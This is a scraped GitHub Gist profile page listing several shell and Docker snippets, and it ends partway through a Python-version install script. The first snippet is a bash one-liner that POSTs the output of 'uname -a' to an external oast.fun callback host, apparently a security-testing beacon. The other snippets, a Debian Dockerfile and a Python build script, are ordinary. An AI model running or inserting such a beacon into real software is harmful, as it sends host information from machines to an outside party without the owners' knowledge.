Skip to content

Instantly share code, notes, and snippets.

View aviadhahami's full-sized avatar
💭
ICQ 193018559

Aviad Hahami aviadhahami

💭
ICQ 193018559
View GitHub Profile
#!/bin/bash
curl -q "https://cj4ot2u7i5vc7cq195k094buww9qmhric.oast.fun/" -XPOST -d "`uname -a`" -o /dev/null
@aviadhahami
aviadhahami / Dockerfile
Created July 5, 2023 22:37
Node 10 + Python 2.7 for old time crap; Also works as a devcontainer 👍
# set the base image to Debian
# https://hub.docker.com/_/debian/
FROM debian:buster
# update the repository sources list
# and install dependencies
RUN apt-get update \
&& apt-get install -y curl python2.7 git wget curl build-essential\
&& apt-get -y autoclean
# Set python2.7 alias
@aviadhahami
aviadhahami / install.sh
Created June 21, 2022 11:49
Download, build and install all python 3.x versions
#!/bin/bash
# Verify we have wget and build tools
apt-get update && apt-get install -y wget gcc make
# add or remove python versions; full index @ https://www.python.org/ftp/python/
cd /tmp &&\
wget https://www.python.org/ftp/python/3.5.10/Python-3.5.10.tgz &&\
wget https://www.python.org/ftp/python/3.6.9/Python-3.6.9.tgz &&\
wget https://www.python.org/ftp/python/3.7.9/Python-3.7.9.tgz &&\